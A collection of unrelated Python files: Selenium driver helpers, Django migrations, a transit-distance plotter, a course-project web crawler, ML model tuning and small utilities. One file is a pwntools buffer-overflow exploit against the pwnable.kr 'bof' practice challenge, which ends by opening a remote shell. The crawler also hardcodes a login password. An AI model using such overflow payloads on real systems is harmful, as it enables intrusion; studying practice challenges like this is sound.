return self.get(url)
def element_exists(self, element):
"""
Whether or not an element exists. Attempts to locate the element using `get_element` returns True if the element
was found, False if it couldn't be located.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: True if the element could be found, False if it couldn't be found
:rtype: bool
"""
try:
self.get_element(element) # attempt to get the element
return True # if it succeeded, return True
except NoSuchElementException:
# The element was not able to be located
return False
def element_visible(self, element):
"""
Checks if an element is visible or not.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: True if the element is visible, else False
:rtype: bool
"""
elem = self.get_element(element)
return elem.is_displayed()
def element_in_viewport(self, element):
"""
Determines the bounding box (rect) of the window and rect of the element.
This information is used to determine whether or not the element is *completely* within the viewport.
:param element: CSS Selector or XPATH used to locate the element
:return:
"""
elem = self.get_element(element)
elem_left_bound = elem.location.get('x')
elem_top_bound = elem.location.get('y')
elem_width = elem.size.get('width')
elem_height = elem.size.get('height')
elem_right_bound = elem_left_bound + elem_width
elem_lower_bound = elem_top_bound + elem_height
win_upper_bound = self.execute_script('return window.pageYOffset')
win_left_bound = self.execute_script('return window.pageXOffset')
win_width = self.execute_script('return document.documentElement.clientWidth')
win_height = self.execute_script('return document.documentElement.clientHeight')
win_right_bound = win_left_bound + win_width
win_lower_bound = win_upper_bound + win_height
return all((win_left_bound <= elem_left_bound,
win_right_bound >= elem_right_bound,
win_upper_bound <= elem_top_bound,
win_lower_bound >= elem_lower_bound)
)
def element_enabled(self, element):
"""
Checks if an element is enabled or not.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: True if the element is enabled, else False
:rtype: bool
"""
elem = self.get_element(element)
return elem.is_enabled()
def element_focused(self, element):
elem = self.get_element(element)
focused_elem = self.switch_to.active_element
return elem == focused_elem
def element_selected(self, element):
"""
Checks if an element is selected or not.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: True if the element is selected, else False
:rtype: bool
"""
elem = self.get_element(element)
return elem.is_selected()
def element_contains(self, element, value):
"""
Checks if an element contains (in value/text) a given string/value
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:param value: the text/value to check for
:type value: str
:return: True or False, whether or not the value was found in the element.
:rtype: bool
"""
elem = self.get_element(element)
element_value = elem.get_property('value')
if element_value is None:
element_value = elem.text
return value in element_value
def element_has_class(self, element, cls):
"""
Checks whether or not an element has a particular css class.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:param cls: The css class to check for
:type cls: str
:return: True if the element has the specified class, else False
:rtype: bool
"""
elem = self.get_element(element)
elem_classes = elem.get_attribute('class')
return cls in elem_classes
def click_element(self, element):
"""
Click on an element. Note: this will not trigger some doubleclick events, even when n=2 with any delay.
Instead, if you want to doubleclick, use `doubleclick_element`
:param element: CSS Selector or XPATH used to locate the element
:type element: str
"""
elem = self.get_element(element)
elem.click()
def doubleclick_element(self, element):
"""
Double click an element
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return:
"""
elem = self.get_element(element)
actions = ActionChains(self)
actions.double_click(elem)
actions.perform()
def click_link_text(self, text, partial=False):
"""
Click on a link, located by matching the text contained in the link. If ``partial`` is True,
the link is located by partial text.
:param text: The text contained in the link, used to locate the element.
:type text: str
:param partial: Whether or not to match link by partial text (as opposed to full match)
:type partial: bool
:return:
"""
if partial:
self.find_element_by_partial_link_text(text).click()
else:
self.find_element_by_link_text(text).click()
def drag_element(self, element, to_element):
"""
Drag an element to the location of another element.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:param to_element: the selector used to locate the destination element
:type to_element: str
:return:
"""
source_elem = self.get_element(element)
to_elem = self.get_element(to_element)
actions = ActionChains(self)
actions.drag_and_drop(source_elem, to_elem)
actions.perform()
def submit(self, element):
"""
Shortcut for submitting an element
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return:
"""
elem = self.get_element(element)
elem.submit()
def send_keys(self, keys):
"""
Send arbitrary keys. Note: this is different than sending keys directly to an element.
:param keys: keys to send
:return:
"""
actions = ActionChains(self)
actions.send_keys(keys)
actions.perform()
def press_button(self, button):
"""
Send a keystroke simulating the press of a given button. You can use keys as strings (e.g. 'a', 'z') or any
key names (e.g. the 'escape' key). When the length of the button argument is greater than one character,
names are checked against selenium.webdriver.common.keys.Keys first.
:param button: A single character or key name
:type button: str
:return:
"""
if len(button) > 1:
button = getattr(Keys, button.upper(), button)
self.send_keys(button)
def scroll_to_bottom(self):
"""
Scrolls the current window to the bottom of the window (0, document.body.scrollHeight).
"""
self.execute_script("window.scrollTo(0, document.body.scrollHeight);")
def scroll_to_element(self, element):
"""
Scroll to the location of an element.
:param element: CSS Selector or XPATH used to locate the element
:return:
"""
location = self.get_element_location(element)
x = location['x']
y = location['y']
self.scroll_to(x, y)
def scroll_to(self, x, y):
"""
Scroll to a particular (x, y) coordinate.
:param x: the x coordinate to scroll to.
:type x: int
:param y: the y coordinate to scroll to.
:type y: int
:return:
"""
# prevent script injection
x = int(x)
y = int(y)
self.execute_script('window.scrollTo({}, {});'.format(x, y))
def move_to_element(self, element, offset=None):
"""
Moves the mouse to the middle of an element
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:param offset: optional tuple of x/y offsets to offset mouse from center
:type offset: tuple
:return:
"""
elem = self.get_element(element)
actions = ActionChains(self)
if offset:
actions.move_to_element_with_offset(elem, *offset)
else:
actions.move_to_element(elem)
actions.perform()
def pause(self, milliseconds):
"""
Pause for a number of miliseconds.
``time.sleep`` is used here due to issues with w3c browsers and ActionChain pause feature.
:param milliseconds: number of miliseconds to wait
:type milliseconds: int
:return:
"""
seconds = round(milliseconds / 1000, 3)
time.sleep(seconds)
def wait_for_element_condition(self, element, ms, negative, condition):
"""
Wait on an element until a certain condition is met, up to a maximum amount of time to wait.
:param element: CSS Selector or XPATH used to locate the element
:param ms: maximum time (in milliseconds) to wait for the condition to be true
:param negative: whether or not the check for negation of condition. Will coarse boolean from value
:param condition: the condition to check for. Defaults to checking for presence of element
:return: element
"""
if not ms:
seconds = self.default_wait
else:
seconds = round(ms / 1000, 3)
condition_text_map = {
'be checked': element_is_selected,
'be enabled': element_is_enabled,
'be selected': element_is_selected,
'be visible': element_is_visible,
'contain a text': element_contains_text,
'contain a value': element_contains_value,
'exist': element_is_present,
}
if condition:
expected = condition_text_map[condition]
else:
expected = element_is_present
if element.startswith('/'):
locator = (By.XPATH, element)
else:
locator = (By.CSS_SELECTOR, element)
wait = WebDriverWait(self, seconds)
try:
result = wait.until(expected(locator, negative=bool(negative)))
except TimeoutException:
result = None
return result
def select_option(self, select_element, by, by_arg):
"""
Implements features for selecting options in Select elements. Uses selenium's ``Select`` support class.
:param select_element: CSS Selector or XPATH used to locate the select element containing options
:param by: the method for selecting the option, valid options include any select_by_X supported by ``Select``.
:type by: str
:return:
"""
select_elem = self.get_element(select_element)
select = Select(select_elem)
select_method = getattr(select, 'select_by_'+by, partial(select.select_by_attr, by))
select_method(by_arg)
@staticmethod
def is_color(str_):
"""
Whether or not the string represents a color.
:param str_:
:return:
"""
try:
Color.from_string(str_)
return True
except ValueError:
return False
class Chrome(BehaveDriverMixin, webdriver.Chrome):
"""
Chrome driver class. Alternate constructors and browser-specific logic is implemented here.
"""
_driver_name = 'chromedriver'
@classmethod
def headless(cls, *args, **kwargs):
chrome_options = kwargs.pop('chrome_options', None)
if chrome_options is None:
chrome_options = ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
kwargs['chrome_options'] = chrome_options
return cls(*args, **kwargs)
class PhantomJS(BehaveDriverMixin, webdriver.PhantomJS):
"""
PhantomJS driver class. Alternate constructors and browser-specific logic is implemented here.
"""
pass
class Firefox(BehaveDriverMixin, webdriver.Firefox):
"""
Firefox driver class. Alternate constructors and browser-specific logic is implemented here.
"""
_driver_name = 'geckodriver'
@classmethod
def headless(cls, *args, **kwargs):
firefox_options = kwargs.pop('firefox_options', None)
if firefox_options is None:
firefox_options = FirefoxOptions()
firefox_options.add_argument('--headless')
kwargs['firefox_options'] = firefox_options
return cls(*args, **kwargs)
@property
def secondary_handles(self):
self.switch_to.window(self.current_window_handle)
try:
# FIXME: there must be a better way
self.wait(1).until(EC.new_window_is_opened(self.window_handles))
self.switch_to.window(self.current_window_handle)
except TimeoutException:
pass
return super(Firefox, self).secondary_handles
@property
def last_opened_handle(self):
self.switch_to.window(self.current_window_handle)
return super(Firefox, self).last_opened_handle
def click_element(self, element):
self.scroll_to_element(element)
super(Firefox, self).click_element(element)
def doubleclick_element(self, element):
"""
Overrides the doubleclick method to first scroll to element, and adds JS shim for doubleclick
"""
self.scroll_to_element(element)
elem = self.get_element(element)
script = ("var evObj = new MouseEvent('dblclick', {bubbles: true, cancelable: true, view: window}); "
" arguments[0].dispatchEvent(evObj);")
self.execute_script(script, elem)
def move_to_element(self, element, offset=None):
self.scroll_to_bottom()
self.scroll_to_element(element)
super(Firefox, self).move_to_element(element, offset=offset)
class Ie(BehaveDriverMixin, webdriver.Ie):
"""
Ie driver class. Alternate constructors and browser-specific logic is implemented here.
"""
_driver_name = 'IEDriverServer'
class Edge(BehaveDriverMixin, webdriver.Edge):
"""
Edge driver class. Alternate constructors and browser-specific logic is implemented here.
"""
_driver_name = 'msedgedriver'
class Opera(BehaveDriverMixin, webdriver.Opera):
"""
Opera driver class. Alternate constructors and browser-specific logic is implemented here.
"""
class Safari(BehaveDriverMixin, webdriver.Safari):
"""
Safari driver class. Alternate constructors and browser-specific logic is implemented here.
"""
_driver_name = 'safaridriver'
class BlackBerry(BehaveDriverMixin, webdriver.BlackBerry):
"""
BlackBerry driver class. Alternate constructors and browser-specific logic is implemented here.
"""
class Android(BehaveDriverMixin, webdriver.Android):
"""
Android driver class. Alternate constructors and browser-specific logic is implemented here.
"""
class Remote(BehaveDriverMixin, webdriver.Remote):
"""
Remote driver class. Alternate constructors and browser-specific logic is implemented here.
"""
|
import argparse
from da_manager import DaData
from data_manager import dataman_factory
from plotter import Plotter
from plotter import ATTR
class Runner(object):
def __init__(self, args):
self._dataset = args.dataset
self._method = args.method
self._daman = DaData()
self._dataman = dataman_factory(self._dataset, link_route_shapes=False, link_stops=True)
def run(self):
plotter = Plotter()
saskatoon_bb = self._daman.get_saskatoon_bounding_box()
plotter.add_polygon(saskatoon_bb)
active_stops = self._dataman.get_active_stops()
result = []
das = self._daman.get_das()
for da in das:
rasters = da.get_rasters(100)
# print "# of rasters:", len(rasters)
for raster in rasters:
min_dist, min_stop = raster.get_closest_stop(active_stops, method=self._method)
result.append((raster, min_dist))
total_dist = 0
for item in result:
dist = item[1]
raster = item[0]
total_dist += dist
p = raster.get_polygon()
opacity = 1 - dist / 500.0
if opacity < 0:
opacity = 0
p.set_attribute(ATTR.FILL_COLOR, "#ff0000")
p.set_attribute(ATTR.FILL_OPACITY, opacity)
p.set_attribute(ATTR.STROKE_WEIGHT, 0)
p.set_attribute(ATTR.STROKE_COLOR, "#202020")
p.set_attribute(ATTR.STROKE_OPACITY, 0)
plotter.add_polygon(p)
print "Ave dist:", total_dist / float(len(result))
plotter.plot("temp/maps/plot_distance_%s_%s.html" % (self._dataset, self._method))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Compute and plot ave dist to closest stop')
parser.add_argument("-d", "--dataset", help="Dataset", type=str, required=True)
parser.add_argument("-m", "--method", help="Distance method: grid/crow", type=str, required=True)
args = parser.parse_args()
runner = Runner(args)
runner.run()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
replaces = [(b'scrub_csv', '0001_initial'), (b'scrub_csv', '0002_auto_20150414_0300'), (b'scrub_csv', '0003_auto_20150414_0301'), (b'scrub_csv', '0004_auto_20150414_0309'), (b'scrub_csv', '0005_uploader_user'), (b'scrub_csv', '0006_auto_20150414_1446')]
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('file_name', models.CharField(max_length=200)),
('upload_date', models.DateTimeField(verbose_name=b'date uploaded')),
],
),
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('row', models.PositiveIntegerField()),
('doc_key', models.CharField(max_length=200)),
('doc_value', models.CharField(default=b'', max_length=200)),
('document', models.ForeignKey(to='scrub_csv.Document')),
],
),
migrations.CreateModel(
name='Uploader',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('user', models.OneToOneField(default=0, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='document',
name='uploader',
field=models.ForeignKey(to='scrub_csv.Uploader'),
),
migrations.RenameField(
model_name='document',
old_name='file_name',
new_name='csvfile',
),
migrations.RemoveField(
model_name='document',
name='csvfile',
),
migrations.AddField(
model_name='document',
name='file_name',
field=models.CharField(default=1, max_length=200),
preserve_default=False,
),
]
|
# Generated by Django 3.1.5 on 2021-02-15 13:26
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20210211_1747'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2021, 2, 15, 13, 26, 8, 456720, tzinfo=utc)),
),
migrations.AlterField(
model_name='post',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2021, 2, 15, 13, 26, 8, 455720, tzinfo=utc)),
),
]
|
from category import Category
class Expense(Category):
def __init__(self, amount, name, date):
super().__init__(amount, name, date)
self.type = 'Expense'
def __str__(self):
return '{} - {}'.format(super().__str__(), self.type)
def __repr__(self):
return '{} - {}'.format(super().__repr__(), self.type)
def __eq__(self, other):
return super().__eq__(other)
if __name__ == '__main__':
main() |
class Thing(object):
def __init__(self, health, damage):
self.health = health
self.damage = damage
def accept(self, _):
self.health -= self.damage
class Marine(Thing):
def __init__(self):
super(Marine, self).__init__(100, 21)
class Marauder(Thing):
def __init__(self):
super(Marauder, self).__init__(125, 32)
class TankBullet:
pass
|
# 存放模型,
from exts import db
from datetime import datetime
class User(db.Model):
__tablenme__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
telephone = db.Column(db.String(11), nullable=False)
username = db.Column(db.String(50), nullable=False)
password = db.Column(db.String(100), nullable=False)
class Question(db.Model):
__tablenme__ = 'question'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(1000), nullable=False)
content = db.Column(db.Text, nullable=False)
# now()获取服务器第一次运行的时间
# now获取每次创建的时间
create_time = db.Column(db.DateTime, default=datetime.now)
author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
author = db.relationship('User', backref=db.backref('questions'))
# 评论跟问题是1对多,1个用户也能发多条评论
class Answer(db.Model):
__tablenme__ = 'answer'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
comment = db.Column(db.Text, nullable=False)
create_time=db.Column(db.DateTime,default=datetime.now)
question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
question = db.relationship('Question', backref=db.backref('answers',order_by=id.desc()))#在这里进行评论的排序
auth = db.relationship('User', backref=db.backref('answers'))
|
#!/usr/bin/env python
import socket
import sys
import ssl
import time
from HTMLParser import HTMLParser
from htmlentitydefs import name2codepoint
urlText = []
attributes_url = []
Main_url_list = []
class MyHTMLParser(HTMLParser):
#def handle_starttag(self, tag, attrs):
#print "Start tag:", tag
#for attr in attrs:
#print " attr:", attr
def handle_starttag(self, tag, attrs):
# Only parse the 'anchor' tag.
if tag == "a":
# Check the list of defined attributes.
for name, value in attrs:
# If href is defined, print it.
if name == "href" and value.startswith("/fakebook/"):
print name, "=", value
attributes_url.append(value)
#def handle_endtag(self, tag):
#print "End tag :", tag
def handle_data(self, data):
#print "Data :", data
if data != '\n':
urlText.append(data)
#def handle_comment(self, data):
#print "Comment :", data
def handle_entityref(self, name):
c = unichr(name2codepoint[name])
#print "Named ent:", c
def handle_charref(self, name):
if name.startswith('x'):
c = unichr(int(name[1:], 16))
else:
c = unichr(int(name))
#print "Num ent :", c
#def handle_decl(self, data):
#print "Decl :", data
parser = MyHTMLParser()
def Send_GET_request(sock,URL,csrf_token,session_id_POST):
Get_request = "GET " + URL + " HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
print(data)
return data
def Create_main_queue(current_url):
global Main_url_list
Main_url_list = list(set(Main_url_list) | set(current_url))
Main_url_list = [x for x in Main_url_list if len(x) > 10]
def Crawl(sock,parser,data,csrf_token,session_id_POST):
print("==================== Start of crwling function ======================================\n\n")
global urlText
global attributes_url
global Main_url_list
attributes_url = []
parser.feed(data)
#print(attributes_url)
Create_main_queue(attributes_url)
print(Main_url_list)
parser.close()
#Get the flag if there
#return condition to break recursion
if len(Main_url_list) == 0:
return
print("==================== New GET request Start ======================================\n\n")
data = Send_GET_request(sock,Main_url_list[0],csrf_token,session_id_POST)
if data != 0:
Main_url_list.pop(0)
print("==================== New GET request End ======================================\n\n")
Crawl(sock,parser,data,csrf_token,session_id_POST)
return
#attributes_url = []
#parser.feed(data)
#print(attributes_url)
print("========================== End of crwling function ================================\n\n")
'''
Get_request = "GET " + attributes_url[1] + " HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
print(data)
attributes_url = []
parser.feed(data)
print(attributes_url)
print("==========================================================\n\n")
parser.close()
Get_request = "GET " + attributes_url[2] + " HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
print(data)
print("==========================================================\n\n")
'''
def StartCrawling(sock,server_address):
# print(server_address)
sock.connect(server_address)
global urlText
global attributes_url
Get_request = """GET http://cs5700f16.ccs.neu.edu/ HTTP/1.0\n
\n"""
# sock.send(Get_request)
# data = sock.recv(10256)
# print(data)
Get_request = """GET http://cs5700f16.ccs.neu.edu/fakebook/ HTTP/1.0\n
\n"""
#sock.send(Get_request)
#data = sock.recv(10256)
#print(data)
Get_request = "GET http://cs5700sp17.ccs.neu.edu/accounts/login/ HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Connection: keep-alive\n\n"
#print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
#print(data)
parser.feed(data)
#print(urlText)
headers = []
headers = urlText[0].split('\n')
parser.close()
csrf_token = headers[7].split(' ')[1]
session_id = headers[8].split(' ')[1][:-1]
#print(csrf_token)
#print(session_id)
Cookie = "Cookie: " + csrf_token + " " + session_id + "\r\n"
csrfmiddlewaretoken = "csrfmiddlewaretoken=" + csrf_token[10:]
#print(Cookie)
#content_length = len(csrfmiddlewaretoken[:-1] + "&username=001218078&password=A52VUCSQ&next=%2Ffakebook%2f")
body = 'csrfmiddlewaretoken={0}&username=001218078&password=A52VUCSQ&next=%2fFacebook%2f'.format(csrf_token[10:-1])
content_length = len(body)
login = ["POST " + "/accounts/login/" + " HTTP/1.1",
"Host: cs5700sp17.ccs.neu.edu",
"Cookie: {0} {1}".format(csrf_token, session_id),
"Connection: keep-alive",
"Content-Type: application/x-www-form-urlencoded",
"Content-Length: {0}".format(content_length)]
space = "\r\n"
newlogin = space.join(login)
Post_message = newlogin + "\r\n\r\n" + body
#print(Post_message)
sock.send(Post_message)
data1 = sock.recv(12345)
#print(data1)
urlText = []
parser.feed(data1)
#print(urlText)
headers = urlText[0].split('\n')
session_id_POST = headers[7].split(' ')[1]
parser.close()
#print(session_id_POST)
Get_request = "GET http://cs5700sp17.ccs.neu.edu/fakebook/ HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
#print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
#print(data)
#parser.feed(data)
#print(attributes_url)
#parser.close()
#get_friends = ["GET {0} HTTP/1.1".format(attributes_url[1]),
# "Host: cs5700sp17.ccs.neu.edu",
# "Cookie: {0} {1}\n".format(csrf_token,session_id_POST[:-1])]
#space1 = "\n"
#Get_request = space1.join(login)
#Post_message = newget_freiend + "\r\n\r\n" + body
print(data)
Crawl(sock,parser,data,csrf_token,session_id_POST)
sock.close()
def Main():
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 80
hostname = "cs5700f16.ccs.neu.edu"
server_address = ( hostname , int(port))
StartCrawling(sock,server_address)
#Trigger Main()
if __name__ == "__main__":
Main()
|
#!/usr/bin/env python3
import pwn
pwn.context(arch = "i386", os = "linux")
PAYLOAD = pwn.flat('A' * (44+4+4), 0xcafebabe, '\n')
r = pwn.remote("pwnable.kr", 9000)
r.send(PAYLOAD)
r.interactive()
|
#!/usr/bin/python3
""" saves all hot posts """
import requests
def recurse(subreddit, hot_list=[]):
rURL = "https://www.reddit.com/r/{}/hot.json".format(subreddit)
h = {"User-Agent": 'any agent'}
derulo = requests.get(rURL, headers=h, allow_redirects=False).json()
if derulo is None:
return
data = derulo.get('data')
if data is None:
return
post_list = data.get('children')
return(post_list)
|
def is_palindrome(s):
s = ''.join(a for a in s.lower() if a.isalpha())
return s == s[::-1]
|
import argparse
import json
from os.path import join
from typing import List
import numpy as np
import pandas as pd
from tqdm import tqdm
from docqa import trainer
from docqa.data_processing.document_splitter import MergeParagraphs, TopTfIdf, ShallowOpenWebRanker, FirstN
from docqa.data_processing.preprocessed_corpus import preprocess_par
from docqa.data_processing.qa_training_data import ParagraphAndQuestionDataset
from docqa.data_processing.span_data import TokenSpans
from docqa.data_processing.text_utils import NltkPlusStopWords
from docqa.dataset import FixedOrderBatcher
from docqa.eval.ranked_scores import compute_ranked_scores
from docqa.evaluator import Evaluator, Evaluation
from docqa.model_dir import ModelDir
from build_span_corpus import XQADataset
from docqa.triviaqa.read_data import normalize_wiki_filename
from docqa.triviaqa.training_data import DocumentParagraphQuestion, ExtractMultiParagraphs, \
ExtractMultiParagraphsPerQuestion
from docqa.triviaqa.trivia_qa_eval import exact_match_score as trivia_em_score
from docqa.triviaqa.trivia_qa_eval import f1_score as trivia_f1_score
from docqa.utils import ResourceLoader, print_table
from docqa.text_preprocessor import WithIndicators
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--n_processes', type=int, default=1,
help="Number of processes to do the preprocessing (selecting paragraphs+loading context) with")
parser.add_argument('-a', '--async', type=int, default=10)
parser.add_argument('-t', '--tokens', type=int, default=400,
help="Max tokens per a paragraph")
parser.add_argument('-n', '--n_sample', type=int, default=None, help="Number of questions to evaluate on")
parser.add_argument('-g', '--n_paragraphs', type=int, default=15,
help="Number of paragraphs to run the model on")
parser.add_argument('-f', '--filter', type=str, default=None, choices=["tfidf", "truncate", "linear"],
help="How to select paragraphs")
parser.add_argument('-c', '--corpus',
choices=["en_dev",
"en_test",
"fr_dev",
"fr_test",
"de_dev",
"de_test",
"ru_dev",
"ru_test",
"pt_dev",
"pt_test",
"zh_dev",
"zh_test",
"pl_dev",
"pl_test",
"uk_dev",
"uk_test",
"ta_dev",
"ta_test",
"fr_trans_en_dev",
"fr_trans_en_test",
"de_trans_en_dev",
"de_trans_en_test",
"ru_trans_en_dev",
"ru_trans_en_test",
"pt_trans_en_dev",
"pt_trans_en_test",
"zh_trans_en_dev",
"zh_trans_en_test",
"pl_trans_en_dev",
"pl_trans_en_test",
"uk_trans_en_dev",
"uk_trans_en_test",
"ta_trans_en_dev",
"ta_trans_en_test"],
required=True)
args = parser.parse_args()
corpus_name = args.corpus[:args.corpus.rfind("_")]
eval_set = args.corpus[args.corpus.rfind("_")+1:]
dataset = XQADataset(corpus_name)
if eval_set == "dev":
test_questions = dataset.get_dev()
elif eval_set == "test":
test_questions = dataset.get_test()
else:
raise AssertionError()
corpus = dataset.evidence
splitter = MergeParagraphs(args.tokens)
per_document = args.corpus.startswith("web") # wiki and web are both multi-document
filter_name = args.filter
if filter_name is None:
# Pick default depending on the kind of data we are using
if per_document:
filter_name = "tfidf"
else:
filter_name = "linear"
print("Selecting %d paragraphs using method \"%s\" per %s" % (
args.n_paragraphs, filter_name, ("question-document pair" if per_document else "question")))
if filter_name == "tfidf":
para_filter = TopTfIdf(NltkPlusStopWords(punctuation=True), args.n_paragraphs)
elif filter_name == "truncate":
para_filter = FirstN(args.n_paragraphs)
elif filter_name == "linear":
para_filter = ShallowOpenWebRanker(args.n_paragraphs)
else:
raise ValueError()
n_questions = args.n_sample
if n_questions is not None:
test_questions.sort(key=lambda x:x.question_id)
np.random.RandomState(0).shuffle(test_questions)
test_questions = test_questions[:n_questions]
preprocessor = WithIndicators()
print("Building question/paragraph pairs...")
# Loads the relevant questions/documents, selects the right paragraphs, and runs the model's preprocessor
if per_document:
prep = ExtractMultiParagraphs(splitter, para_filter, preprocessor, require_an_answer=False)
else:
prep = ExtractMultiParagraphsPerQuestion(splitter, para_filter, preprocessor, require_an_answer=False)
prepped_data = preprocess_par(test_questions, corpus, prep, args.n_processes, 1000)
data = []
for q in prepped_data.data:
for i, p in enumerate(q.paragraphs):
if q.answer_text is None:
ans = None
else:
ans = TokenSpans(q.answer_text, p.answer_spans)
data.append(DocumentParagraphQuestion(q.question_id, p.doc_id,
(p.start, p.end), q.question, p.text,
ans, i))
# Reverse so our first batch will be the largest (so OOMs happen early)
questions = sorted(data, key=lambda x: (x.n_context_words, len(x.question)), reverse=True)
# dump eval data for bert
import pickle
pickle.dump(questions, open("%s_%d.pkl" % (args.corpus, args.n_paragraphs), "wb"))
if __name__ == "__main__":
main()
|
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier
from sklearn.metrics import roc_auc_score,accuracy_score
class ModelFinder:
"""
This class shall be used to find the model with best accuracy and AUC score.
Written By: Durgesh Kumar
Version: 1.0
Revisions: None
"""
def __init__(self, file, logger):
self.file = file
self.logger = logger
self.rfc = RandomForestClassifier()
self.xgb = XGBClassifier(objective='binary:logistic')
def GetBestParamsForRandomForest(self,train_x,train_y):
"""
Method Name: GetBestParamsForRandomForest
Description: get the parameters for Random Forest Algorithm which give the best accuracy.
Use Hyper Parameter Tuning.
Output: The model with the best parameters
On Failure: Raise Exception
Written By: Durgesh Kumar
Version: 1.0
Revisions: None
"""
self.logger.log(self.file, 'Entered the GetBestParamsForRandomForest method of the ModelFinder class')
try:
# initializing with different combination of parameters
self.param_grid = {"n_estimators": [10, 50, 100, 130], "criterion": ['gini', 'entropy'],
"max_depth": range(2, 4, 1), "max_features": ['auto', 'log2']}
#Creating an object of the Grid Search class
self.grid = GridSearchCV(estimator=self.rfc, param_grid=self.param_grid, cv=5, verbose=3)
#finding the best parameters
self.grid.fit(train_x, train_y)
#extracting the best parameters
self.criterion = self.grid.best_params_['criterion']
self.max_depth = self.grid.best_params_['max_depth']
self.max_features = self.grid.best_params_['max_features']
self.n_estimators = self.grid.best_params_['n_estimators']
#creating a new model with the best parameters
self.rfc = RandomForestClassifier(n_estimators=self.n_estimators, criterion=self.criterion,
max_depth=self.max_depth, max_features=self.max_features)
# training the mew model
self.rfc.fit(train_x, train_y)
self.logger.log(self.file,'Random Forest best params: '+str(self.grid.best_params_)+'. Exited the GetBestParamsForRandomForest method of the ModelFinder class')
return self.rfc
except Exception as e:
self.logger.log(self.file,'Exception occured in GetBestParamsForRandomForest method of the ModelFinder class. Exception message: ' + str(e))
self.logger.log(self.file,'Random Forest Parameter tuning failed. Exited the GetBestParamsForRandomForest method of the ModelFinder class')
raise Exception()
def GetBestParamsForXgboost(self,train_x,train_y):
"""
Method Name: GetBestParamsForXgboost
Description: get the parameters for XGBoost Algorithm which give the best accuracy.
Use Hyper Parameter Tuning.
Output: The model with the best parameters
On Failure: Raise Exception
Written By: Durgesh Kumar
Version: 1.0
Revisions: None
"""
self.logger.log(self.file,'Entered the GetBestParamsForXgboost method of the ModelFinder class')
try:
# initializing with different combination of parameters
self.param_grid_xgboost = {
'learning_rate': [0.5, 0.1, 0.01, 0.001],
'max_depth': [3, 5, 10, 20],
'n_estimators': [10, 50, 100, 200]
}
# Creating an object of the Grid Search class
self.grid= GridSearchCV(XGBClassifier(objective='binary:logistic'),self.param_grid_xgboost, verbose=3,cv=5)
# finding the best parameters
self.grid.fit(train_x, train_y)
# extracting the best parameters
self.learning_rate = self.grid.best_params_['learning_rate']
self.max_depth = self.grid.best_params_['max_depth']
self.n_estimators = self.grid.best_params_['n_estimators']
# creating a new model with the best parameters
self.xgb = XGBClassifier(learning_rate=1, max_depth=5, n_estimators=50)
# training the mew model
self.xgb.fit(train_x, train_y)
self.logger.log(self.file,'XGBoost best params: ' + str(self.grid.best_params_) + '. Exited the GetBestParamsForXgboost method of the ModelFinder class')
return self.xgb
except Exception as e:
self.logger.log(self.file,'Exception occured in GetBestParamsForXgboost method of the Model_Finder class. Exception message: ' + str(e))
self.logger.log(self.file,'XGBoost Parameter tuning failed. Exited the GetBestParamsForXgboost method of the ModelFinder class')
raise Exception()
def GetBestModel(self,train_x,train_y,test_x,test_y):
"""
Method Name: GetBestModel
Description: Find out the Model which has the best AUC score.
Output: The best model name and the model object
On Failure: Raise Exception
Written By: Durgesh Kumar
Version: 1.0
Revisions: None
"""
self.logger.log(self.file,'Entered the GetBestModel method of the ModelFinder class')
# create best model for XGBoost
try:
